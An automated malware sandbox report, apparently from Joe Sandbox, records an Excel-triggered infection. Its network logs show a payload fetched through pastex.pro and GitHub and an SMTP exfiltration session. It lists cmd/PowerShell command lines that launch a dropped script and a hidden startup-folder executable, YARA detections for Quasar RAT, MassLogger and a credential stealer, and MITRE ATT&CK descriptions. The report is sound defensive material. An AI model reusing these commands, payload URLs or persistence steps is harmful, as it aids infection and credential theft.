Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	smtp.saleforceconsults.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.662655115 CET	8.8.8.8	192.168.2.4	0x2f9f	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	smtp.saleforceconsults.com	us2.smtp.mailhostbox.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.223	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.198.143	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.225	A (IP address)	IN (0x0001)
Feb 22, 2021 20:36:27.954674006 CET	8.8.8.8	192.168.2.4	0xb879	No error (0)	us2.smtp.mailhostbox.com		208.91.199.224	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

pastex.pro

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49739	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:02.584227085 CET	1467	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:02.643884897 CET	1467	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:02 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49747	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:26.578821898 CET	2090	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:26.635423899 CET	2091	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:26 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49751	54.225.220.115	80	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:46.221090078 CET	2707	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Feb 22, 2021 20:35:46.361371994 CET	2708	IN	HTTP/1.1 200 OK Server: Cowboy Connection: keep-alive Content-Type: text/plain Vary: Origin Date: Mon, 22 Feb 2021 19:35:46 GMT Content-Length: 11 Via: 1.1 vegur Data Raw: 38 34 2e 31 37 2e 35 32 2e 33 38 Data Ascii: 84.17.52.38

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49754	45.148.121.68	80	C:\ProgramData\a.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:35:57.087357998 CET	2755	OUT	GET /b/AEmdBGcmp HTTP/1.1 Host: pastex.pro Connection: Keep-Alive
Feb 22, 2021 20:35:57.143479109 CET	2755	IN	HTTP/1.1 301 Moved Permanently Connection: Keep-Alive Location: https://raw.githubusercontent.com/Sangiz1/sz4/main/lkk Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Mon, 22 Feb 2021 19:35:57 GMT Server: LiteSpeed

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 22, 2021 20:34:52.822681904 CET	185.162.146.6	443	192.168.2.4	49731	CN=webdisk.seyranikenger.com.tr CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Jan 02 09:19:01 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri Apr 02 10:19:01 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 22, 2021 20:34:52.822681904 CET	185.162.146.6	443	192.168.2.4	49731	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 22, 2021 20:35:02.844924927 CET	185.199.108.133	443	192.168.2.4	49741	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:02.844924927 CET	185.199.108.133	443	192.168.2.4	49741	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:26.871342897 CET	185.199.108.133	443	192.168.2.4	49748	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:26.871342897 CET	185.199.108.133	443	192.168.2.4	49748	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:57.410118103 CET	185.199.108.133	443	192.168.2.4	49755	CN=www.github.com, O="GitHub, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed May 06 02:00:00 CEST 2020 Tue Oct 22 14:00:00 CEST 2013	Thu Apr 14 14:00:00 CEST 2022 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	3b5074b1b5d032e5620f69f9f700ff0e
Feb 22, 2021 20:35:57.410118103 CET	185.199.108.133	443	192.168.2.4	49755	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		3b5074b1b5d032e5620f69f9f700ff0e

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 22, 2021 20:36:28.710617065 CET	587	49761	208.91.199.223	192.168.2.4	220 us2.outbound.mailhostbox.com ESMTP Postfix
Feb 22, 2021 20:36:28.711088896 CET	49761	587	192.168.2.4	208.91.199.223	EHLO 715575
Feb 22, 2021 20:36:28.877445936 CET	587	49761	208.91.199.223	192.168.2.4	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Feb 22, 2021 20:36:28.877710104 CET	49761	587	192.168.2.4	208.91.199.223	STARTTLS
Feb 22, 2021 20:36:29.041897058 CET	587	49761	208.91.199.223	192.168.2.4	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 7032 Parent PID: 800

General

Start time:	20:34:46
Start date:	22/02/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0xf00000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: a.exe PID: 6200 Parent PID: 7032

General

Start time:	20:34:52
Start date:	22/02/2021
Path:	C:\ProgramData\a.exe
Wow64 process (32bit):	true
Commandline:	C:\PROGRAMDATA\a.exe
Imagebase:	0x410000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 8%, Metadefender, Browse Detection: 28%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 6632 Parent PID: 6200

General

Start time:	20:35:04
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c timeout 4 & 'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js' && powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6616 Parent PID: 6632

General

Start time:	20:35:05
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 2860 Parent PID: 6632

General

Start time:	20:35:05
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 4
Imagebase:	0xcd0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: wscript.exe PID: 4180 Parent PID: 6632

General

Start time:	20:35:10
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\wscript.exe' 'C:\Users\user\AppData\Local\Temp\\499262.js'
Imagebase:	0x20000
File size:	147456 bytes
MD5 hash:	7075DD7B9BE8807FCA93ACD86F724884
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 5596 Parent PID: 6632

General

Start time:	20:35:12
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0xf40000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: a.exe PID: 740 Parent PID: 3424

General

Start time:	20:35:22
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x540000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: a.exe PID: 6072 Parent PID: 740

General

Start time:	20:35:31
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0x270000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: a.exe PID: 5036 Parent PID: 740

General

Start time:	20:35:31
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0xa90000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: a.exe PID: 6772 Parent PID: 5596

General

Start time:	20:35:48
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x5b0000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: a.exe PID: 5508 Parent PID: 6772

General

Start time:	20:36:03
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0xb20000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

